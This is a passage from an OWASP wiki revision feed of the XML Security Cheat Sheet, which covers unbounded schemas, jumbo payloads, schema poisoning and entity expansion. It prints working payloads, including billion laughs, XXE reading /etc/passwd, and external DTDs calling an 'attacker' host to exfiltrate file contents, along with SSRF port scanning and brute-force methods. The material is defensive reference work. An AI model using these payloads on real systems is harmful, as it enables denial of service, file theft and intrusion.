  &amp;lt;xs:element name=&amp;quot;operation&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
      &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;buy&amp;quot; maxOccurs=&amp;quot;unbounded&amp;quot;&amp;gt;&lt;br /&gt;
          &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
            &amp;lt;xs:all&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
          &amp;lt;/xs:all&amp;gt;&lt;br /&gt;
        &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&amp;lt;/xs:schema&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema includes a root element named &amp;lt;tt&amp;gt;operation&amp;lt;/tt&amp;gt;, which can contain an unlimited (&amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;) amount of buy elements. This is a common finding, since developers do not normally want to restrict maximum numbers of ocurrences. Applications using limitless occurrences should test what happens when they receive an extremely large amount of elements to be processed. Since computational resources are limited, the consequences should be analyzed and eventually a maximum number ought to be used instead of an unbounded value.&lt;br /&gt;
&lt;br /&gt;
== Jumbo Payloads ==&lt;br /&gt;
Sending an XML document of 1GB requires only a second of server processing and might not be worth consideration as an attack. Instead, an attacker would look for a way to minimize the CPU and traffic used to generate this type of attack, compared to the overall amount of server CPU or traffic used to handle the requests.&lt;br /&gt;
&lt;br /&gt;
=== Traditional Jumbo Payloads ===&lt;br /&gt;
There are two primary methods to make a document larger than normal:&lt;br /&gt;
•	Depth attack: using a huge number of elements, element names, and/or element values.&lt;br /&gt;
•	Width attack: using a huge number of attributes, attribute names, and/or attribute values.&lt;br /&gt;
In most cases, the overall result will be a huge document. This is a short example of what this looks like:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;SOAPENV:ENVELOPE XMLNS:SOAPENV=&amp;quot;HTTP://SCHEMAS.XMLSOAP.ORG/SOAP/ENVELOPE/&amp;quot; XMLNS:EXT=&amp;quot;HTTP://COM/IBM/WAS/WSSAMPLE/SEI/ECHO/B2B/EXTERNAL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;SOAPENV:HEADER LARGENAME1=&amp;quot;LARGEVALUE&amp;quot; LARGENAME2=&amp;quot; LARGEVALUE&amp;quot; LARGENAME3=&amp;quot; LARGEVALUE&amp;quot; …&amp;gt;&lt;br /&gt;
  ...&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== &amp;quot;Small&amp;quot; Jumbo Payloads ===&lt;br /&gt;
The following example is a very small document, but the results of processing this could be similar to those of processing traditional jumbo payloads. The purpose of such a small payload is that it allows an attacker to send many documents fast enough to make the application consume most or all of the available resources:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE includeme [&lt;br /&gt;
  &amp;lt;!ENTITY file SYSTEM &amp;quot;http://attacker/huge.xml&amp;quot; &amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;includeme&amp;gt;&amp;amp;file;&amp;lt;/includeme&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Schema Poisoning ==&lt;br /&gt;
When an attacker is capable of introducing modifications to a schema, there could be multiple high-risk consequences. In particular, the effect of these consequences will be more dangerous if the schemas are using DTD (e.g., file retrieval, denial of service). An attacker could exploit this type of vulnerability in numerous scenarios, always depending on the location of the schema. &lt;br /&gt;
&lt;br /&gt;
=== Local Schema Poisoning ===&lt;br /&gt;
Local schema poisoning happens when schemas are available in the same host, whether or not the schemas are embedded in the same XML document .&lt;br /&gt;
&lt;br /&gt;
==== Embedded Schema ====&lt;br /&gt;
The most trivial type of schema poisoning takes place when the schema is defined within the same XML document. Consider the following, unknowingly vulnerable example provided by the W3C :&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE note [&lt;br /&gt;
  &amp;lt;!ELEMENT note (to,from,heading,body)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT to (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT from (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT heading (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT body (#PCDATA)&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
All restrictions on the note element could be removed or altered, allowing the sending of any type of data to the server. Furthermore, if the server is processing external entities, the attacker could use the schema, for example, to read remote files from the server. This type of schema only serves as a suggestion for sending a document, but it must contains a way to check the embedded schema integrity to be used safely.&lt;br /&gt;
Attacks through embedded schemas are commonly used to exploit external entity expansions. Embedded XML schemas can also assist in port scans of internal hosts or brute force attacks.&lt;br /&gt;
&lt;br /&gt;
==== Incorrect Permissions ====&lt;br /&gt;
You can often circumvent the risk of using remotely tampered versions by processing a local schema. &lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE note SYSTEM &amp;quot;note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
However, if the local schema does not contain the correct permissions, an internal attacker could alter the original restrictions. The following line exemplifies a schema using permissions that allow any user to make modifications:&lt;br /&gt;
 &amp;lt;pre&amp;gt;-rw-rw-rw-  1 user  staff  743 Jan 15 12:32 note.dtd&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The permissions set on &amp;lt;tt&amp;gt;name.dtd&amp;lt;/tt&amp;gt; allow any user on the system to make modifications. This vulnerability is clearly not related to the structure of an XML or a schema, but since these documents are commonly stored in the filesystem, it is worth mentioning that an attacker could exploit this type of problem.&lt;br /&gt;
&lt;br /&gt;
=== Remote Schema Poisoning ===&lt;br /&gt;
Schemas defined by external organizations are normally referenced remotely. If capable of diverting or accessing the network’s traffic, an attacker could cause a victim to fetch a distinct type of content rather than the one originally intended. &lt;br /&gt;
&lt;br /&gt;
==== Man-in-the-Middle (MitM) Attack ====&lt;br /&gt;
When documents reference remote schemas using the unencrypted Hypertext Transfer Protocol (HTTP), the communication is performed in plain text and an attacker could easily tamper with traffic. When XML documents reference remote schemas using an HTTP connection, the connection could be sniffed and modified before reaching the end user:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE note SYSTEM &amp;quot;http://example.com/note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The remote file &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; could be susceptible to tampering when transmitted using the unencrypted HTTP protocol. One tool available to facilitate this type of attack is mitmproxy . &lt;br /&gt;
&lt;br /&gt;
==== DNS-Cache Poisoning ====&lt;br /&gt;
Remote schema poisoning may also be possible even when using encrypted protocols like Hypertext Transfer Protocol Secure (HTTPS). When software performs reverse Domain Name System (DNS) resolution on an IP address to obtain the hostname, it may not properly ensure that the IP address is truly associated with the hostname. In this case, the software enables an attacker to redirect content to their own Internet Protocol (IP) addresses .&lt;br /&gt;
The previous example referenced the host example.com using an unencrypted protocol. When switching to HTTPS, the location of the remote schema will look like  https://example/note.dtd. In a normal scenario, the IP of example.com resolves to 1.1.1.1:&lt;br /&gt;
 &amp;lt;pre&amp;gt;$ host example.com&lt;br /&gt;
example.com has address 1.1.1.1&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If an attacker compromises the DNS being used, the previous hostname could now point to a new, different IP controlled by the attacker:&lt;br /&gt;
 &amp;lt;pre&amp;gt;$ host example.com&lt;br /&gt;
example.com has address 2.2.2.2&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
When accessing the remote file, the victim may be actually retrieving the contents of a location controlled by an attacker.&lt;br /&gt;
&lt;br /&gt;
==== Evil Employee Attack ====&lt;br /&gt;
When third parties host and define schemas, the contents are not under the control of the schemas’ users. Any modifications introduced by a malicious employee—or an external attacker in control of these files—could impact all users processing the schemas. Subsequently, attackers could affect the confidentiality, integrity, or availability of other services (especially if the schema in use is DTD).  &lt;br /&gt;
&lt;br /&gt;
== XML Entity Expansion ==&lt;br /&gt;
If the parser uses a DTD, an attacker might inject data that may adversely affect the XML parser during document processing. These adverse effects could include the parser crashing or accessing local files.&lt;br /&gt;
&lt;br /&gt;
=== Recursive Entity Reference ===&lt;br /&gt;
When the definition of an element &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt; is another element &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt;, and that element &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt; is defined as element &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt;, that schema describes a circular reference between elements:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE A [&lt;br /&gt;
  &amp;lt;!ELEMENT A ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;&amp;lt;A&amp;gt;&amp;amp;B;&amp;lt;/A&amp;gt;&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;!ENTITY B &amp;quot;&amp;amp;A;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;A&amp;gt;&amp;amp;A;&amp;lt;/A&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Quadratic Blowup ===&lt;br /&gt;
Instead of defining multiple small, deeply nested entities, the attacker in this scenario defines one very large entity and refers to it as many times as possible, resulting in a quadratic expansion (O(n2)). The result of the following attack will be 100,000*100,000 characters in memory.&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;AAAAA...(a 100.000 A's)...AAAAA&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...(a 100.000 &amp;amp;A;'s)...&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Billion Laughs ===&lt;br /&gt;
When an XML parser tries to resolve the external entities included within the following code, it will cause the application to start consuming all of the available memory until the process crashes. This is an example XML document with an embedded DTD schema including the attack:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE TEST [&lt;br /&gt;
 &amp;lt;!ELEMENT TEST ANY&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;TEST&amp;gt;&amp;amp;LOL9;&amp;lt;/TEST&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The entity &amp;lt;tt&amp;gt;LOL9&amp;lt;/tt&amp;gt; will be resolved as the 10 entities defined in &amp;lt;tt&amp;gt;LOL8&amp;lt;/tt&amp;gt;; then each of these entities will be resolved in &amp;lt;tt&amp;gt;LOL7&amp;lt;/tt&amp;gt; and so on. Finally, the CPU and/or memory will be affected by parsing the 3*10^9 (3,000,000,000) entities defined in this schema, which could make the parser crash. &lt;br /&gt;
&lt;br /&gt;
The Simple Object Access Protocol (SOAP) specification forbids DTDs completely. This means that a SOAP processor can reject any SOAP message that contains a DTD. Despite this specification, certain SOAP implementations did parse DTD schemas within SOAP messages. The following example illustrates a case where the parser is not following the specification, enabling a reference to a DTD in a SOAP message :&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?XML VERSION=&amp;quot;1.0&amp;quot; ENCODING=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE SOAP-ENV:ENVELOPE [ &lt;br /&gt;
  &amp;lt;!ELEMENT SOAP-ENV:ENVELOPE ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ATTLIST SOAP-ENV:ENVELOPE ENTITYREFERENCE CDATA #IMPLIED&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt; &lt;br /&gt;
&amp;lt;SOAP:ENVELOPE ENTITYREFERENCE=&amp;quot;&amp;amp;LOL9;&amp;quot; XMLNS:SOAP=&amp;quot;HTTP://SCHEMAS.XMLSOAP.ORG/SOAP/ENVELOPE/&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;SOAP:BODY&amp;gt; &lt;br /&gt;
    &amp;lt;KEYWORD XMLNS=&amp;quot;URN:PARASOFT:WS:STORE&amp;quot;&amp;gt;FOO&amp;lt;/KEYWORD&amp;gt;&lt;br /&gt;
  &amp;lt;/SOAP:BODY&amp;gt;&lt;br /&gt;
&amp;lt;/SOAP:ENVELOPE&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Reflected File Retrieval ===&lt;br /&gt;
Consider the following example code of an XXE:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT includeme ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY xxe SYSTEM &amp;quot;/etc/passwd&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;xxe;&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous XML defines an entity named &amp;lt;tt&amp;gt;xxe&amp;lt;/tt&amp;gt;, which is in fact the contents of &amp;lt;tt&amp;gt;/etc/passwd&amp;lt;/tt&amp;gt;, which will be expanded within the &amp;lt;tt&amp;gt;includeme&amp;lt;/tt&amp;gt; tag. If the parser allows references to external entities, it might include the contents of that file in the XML response or in the error output. &lt;br /&gt;
&lt;br /&gt;
=== Server Side Request Forgery ===&lt;br /&gt;
Server Side Request Forgery (SSRF ) happens when the server receives a malicious XML schema, which makes the server retrieve remote resources such as a file, a file via HTTP/HTTPS/FTP, etc. SSRF has been used to retrieve remote files, to prove a XXE when you cannot reflect back the file or perform port scanning, or perform brute force attacks on internal networks.&lt;br /&gt;
&lt;br /&gt;
==== External Connection ====&lt;br /&gt;
Whenever there is an XXE and you cannot retrieve a file, you can test if you would be able to establish remote connections:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [ &lt;br /&gt;
  &amp;lt;!ENTITY %xxe SYSTEM &amp;quot;http://attacker/evil.dtd&amp;quot;&amp;gt; &lt;br /&gt;
  %xxe;&lt;br /&gt;
]&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== File Retrieval with Parameter Entities ====&lt;br /&gt;
Parameter entities allows for the retrieval of content using URL references. Consider the following malicious XML document:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;utf-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY % file SYSTEM &amp;quot;file:///etc/passwd&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY % dtd SYSTEM &amp;quot;http://attacker/evil.dtd&amp;quot;&amp;gt;&lt;br /&gt;
  %dtd;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;send;&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Here the DTD defines two external parameter entities: &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt; loads a local file, and &amp;lt;tt&amp;gt;dtd&amp;lt;/tt&amp;gt; which loads a remote DTD. The remote DTD should contain something like this::&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!ENTITY % all &amp;quot;&amp;lt;!ENTITY send SYSTEM 'http://example.com/?%file;'&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
%all;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The second DTD causes the system to send the contents of the &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt; back to the attacker's server as a parameter of the URL. &lt;br /&gt;
&lt;br /&gt;
==== Port Scanning ====&lt;br /&gt;
The amount and type of information will depend on the type of implementation. Responses can be classified as follows, ranking from easy to complex:&lt;br /&gt;
&lt;br /&gt;
''' 1) Complete Disclosure '''&lt;br /&gt;
The simplest and most unusual scenario, with complete disclosure you can clearly see what’s going on by receiving the complete responses from the server being queried. You have an exact representation of what happened when connecting to the remote host.&lt;br /&gt;
&lt;br /&gt;
''' 2) Error-based '''&lt;br /&gt;
If you are unable to see the response from the remote server, you may be able to use the error response. Consider a web service leaking details on what went wrong in the SOAP Fault element when trying to establish a connection: &lt;br /&gt;
 &amp;lt;pre&amp;gt;java.io.IOException: Server returned HTTP response code: 401 for URL: http://192.168.1.1:80&lt;br /&gt;
	at sun.net.www.protocol.http.HttpURLConnection.getInputStream(HttpURLConnection.java:1459)&lt;br /&gt;
	at com.sun.org.apache.xerces.internal.impl.XMLEntityManager.setupCurrentEntity(XMLEntityManager.java:674)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''' 3) Timeout-based '''&lt;br /&gt;
Timeouts could occur when connecting to open or closed ports depending on the schema and the underlying implementation. If the timeouts occur while you are trying to connect to a closed port (which may take one minute), the time of response when connected to a valid port will be very quick (one second, for example). The differences between open and closed ports becomes quite clear.   &lt;br /&gt;
&lt;br /&gt;
''' 4) Time-based '''&lt;br /&gt;
Sometimes differences between closed and open ports are very subtle. The only way to know the status of a port with certainty would be to take multiple measurements of the time required to reach each host; then analyze the average time for each port to determinate the status of each port. This type of attack will be difficult to accomplish when performed in higher latency networks.&lt;br /&gt;
&lt;br /&gt;
==== Brute Forcing ====&lt;br /&gt;
Once an attacker confirms that it is possible to perform a port scan, performing a brute force attack is a matter of embedding the &amp;lt;tt&amp;gt;username&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;password&amp;lt;/tt&amp;gt; as part of the URI scheme. For example:&lt;br /&gt;
 &amp;lt;pre&amp;gt;foo://username:password@example.com:8080/&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Authors and Primary Editors=&lt;br /&gt;
&lt;br /&gt;
[mailto:fernando.arnaboldi@ioactive.com Fernando Arnaboldi]&lt;/div&gt;</summary>
		<author><name>Fernando.arnaboldi</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224425</id>
		<title>XML Security Cheat Sheet</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224425"/>
				<updated>2016-12-21T20:12:08Z</updated>
		
		<summary type="html">&lt;p&gt;Fernando.arnaboldi: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Specifications for XML and XML schemas include multiple security flaws. At the same time, these specifications provide the tools required to protect XML applications. Even though we use XML schemas to define the security of XML documents, they can be used to perform a variety of attacks: file retrieval, server side request forgery, port scanning, or brute forcing. This cheat sheet exposes how to exploit the different possibilities in libraries and software divided in two sections:&lt;br /&gt;
* '''Malformed XML Documents''': vulnerabilities using not well formed documents.&lt;br /&gt;
* '''Invalid XML Documents''': vulnerabilities using documents that do not have the expected structure.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=  Malformed XML Documents =&lt;br /&gt;
The W3C XML specification defines a set of principles that XML documents must follow to be considered well formed. When a document violates any of these principles, it must be considered a fatal error and the data it contains is considered malformed. Multiple tactics will cause a malformed document: removing an ending tag, rearranging the order of elements into a nonsensical structure, introducing forbidden characters, and so on. The XML parser should stop execution once detecting a fatal error. The document should not undergo any additional processing, and the application should display an error message.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities are to use an XML processor that follows W3C specifications and does not take significant additional time to process malformed documents. In addition, use only well-formed documents and validate the contents of each element and attribute to process only valid values within predefined boundaries.&lt;br /&gt;
&lt;br /&gt;
== More Time Required ==&lt;br /&gt;
A malformed document may affect the consumption of Central Processing Unit (CPU) resources. In certain scenarios, the amount of time required to process malformed documents may be greater than that required for well-formed documents. When this happens, an attacker may exploit an asymmetric resource consumption attack to take advantage of the greater processing time to cause a Denial of Service (DoS). &lt;br /&gt;
&lt;br /&gt;
